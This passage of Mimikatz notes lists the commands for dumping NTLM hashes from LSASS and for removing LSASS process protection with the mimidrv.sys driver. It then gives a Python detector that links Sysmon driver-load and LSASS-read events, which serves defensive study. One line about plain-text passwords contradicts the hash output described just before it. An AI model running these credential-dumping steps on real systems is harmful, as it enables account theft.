This provides NTLM hashes for recently logged-in users:

privilege::debug
token::elevate
sekurlsa::msv

Cached passwords are dumped as plain text instead of NT hashes.

The LSASS process can be protected against memory-based attacks. This protection can be bypassed by loading the mimidrv.sys driver and then executing !processprotect /process:lsass.exe /remove from within the Mimikatz shell.
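
Seen from the detection side, the sequence above leaves two traces: a load of mimidrv.sys, then a memory read of lsass.exe. The following is an added example, not part of the original notes. It correlates the two over constructed Sysmon-style events; the JSON export shape, the sample paths and the 10-minute window are assumptions.

```python
import json
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010        # access right required to read another process's memory
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment

# Constructed sample: Sysmon Event ID 6 (driver loaded) and ID 10 (process
# accessed) as JSON lines; "host", "time" and "id" are an assumed export shape.
SAMPLE = r"""
{"host":"ws01","time":"2024-05-01T10:00:00","id":6,"ImageLoaded":"C:\\Tools\\mimidrv.sys"}
{"host":"ws01","time":"2024-05-01T10:02:30","id":10,"SourceImage":"C:\\Tools\\m.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010"}
{"host":"ws01","time":"2024-05-01T10:30:00","id":10,"SourceImage":"C:\\Tools\\m.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010"}
{"host":"ws02","time":"2024-05-01T10:05:00","id":10,"SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1000"}
{"host":"ws03","time":"2024-05-01T11:00:00","id":6,"ImageLoaded":"C:\\Windows\\System32\\drivers\\tcpip.sys"}
"""

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(lines):
    """Return (host, time, reason) alerts for a mimidrv.sys load and LSASS reads after it."""
    events = sorted((json.loads(l) for l in lines.splitlines() if l.strip()),
                    key=lambda e: e["time"])
    alerts, driver_loaded = [], {}
    for e in events:
        when = datetime.fromisoformat(e["time"])
        # Matches only the file name given in the notes; hash or signer
        # matching on the same event is sturdier where those fields exist.
        if e["id"] == 6 and basename(e["ImageLoaded"]) == "mimidrv.sys":
            driver_loaded[e["host"]] = when
            alerts.append((e["host"], e["time"], "mimidrv.sys driver loaded"))
        elif e["id"] == 10 and basename(e["TargetImage"]) == "lsass.exe":
            loaded = driver_loaded.get(e["host"])
            reads_memory = int(e["GrantedAccess"], 16) & PROCESS_VM_READ
            if reads_memory and loaded and when - loaded <= WINDOW:
                alerts.append((e["host"], e["time"],
                               "LSASS memory access by " + basename(e["SourceImage"])))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(*alert, sep="  ")
```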